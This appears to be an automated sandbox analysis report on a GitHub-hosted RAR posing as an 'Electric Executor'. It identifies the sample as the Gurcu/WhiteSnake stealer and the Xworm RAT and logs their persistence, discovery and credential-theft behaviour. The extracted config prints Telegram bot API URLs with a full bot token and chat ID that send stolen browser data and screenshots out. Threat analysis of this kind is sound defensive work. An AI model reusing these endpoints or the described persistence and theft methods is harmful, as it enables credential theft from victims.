gurcu | hxxps://github[.]com/GetElectric/Electric-Executor/releases/download/Electric/Electric-[.]rar

Analysis

max time kernel
133s
max time network
133s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
11-01-2025 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/GetElectric/Electric-Executor/releases/download/Electric/Electric-.rar

Score

10^/10

gurcu xworm discovery persistence rat spyware stealer trojan

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.23%20kb

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/files/0x002a00000004632b-553.dat	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000\Control Panel\International\Geo\Nation	Update.exe

Executes dropped EXE 2 IoCs

pid	Process
2584	Command Reciever.exe
1720	Update.exe

Loads dropped DLL 2 IoCs

pid	Process
2584	Command Reciever.exe
1720	Update.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
62	camo.githubusercontent.com
85	raw.githubusercontent.com
86	raw.githubusercontent.com
92	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
82	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
756	tasklist.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7c9342a6-635a-462d-887c-0ed393d50882.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250111174722.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4116	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 29 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Command Reciever.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Command Reciever.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Command Reciever.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Command Reciever.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Command Reciever.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Command Reciever.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2600	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1620	msedge.exe
1620	msedge.exe
1960	msedge.exe
1960	msedge.exe
1268	identity_helper.exe
1268	identity_helper.exe
2316	msedge.exe
2316	msedge.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
2584	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
1720	Update.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe
4852	Command Reciever.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4852	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2584	Command Reciever.exe
Token: SeDebugPrivilege	756	tasklist.exe
Token: SeDebugPrivilege	1720	Update.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
4852	Command Reciever.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
1960	msedge.exe
4852	Command Reciever.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1720	Update.exe
4852	Command Reciever.exe
4852	Command Reciever.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 3940	1960	msedge.exe	81
PID 1960 wrote to memory of 3940	1960	msedge.exe	81
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1924	1960	msedge.exe	82
PID 1960 wrote to memory of 1620	1960	msedge.exe	83
PID 1960 wrote to memory of 1620	1960	msedge.exe	83
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84
PID 1960 wrote to memory of 2268	1960	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/GetElectric/Electric-Executor/releases/download/Electric/Electric-.rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff8ae9246f8,0x7ff8ae924708,0x7ff8ae924718
  2⤵
  PID:3940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
  2⤵
  PID:2268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:8
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:2488
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff62f475460,0x7ff62f475470,0x7ff62f475480
    3⤵
    PID:4200
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1676 /prefetch:8
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
  2⤵
  PID:2296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
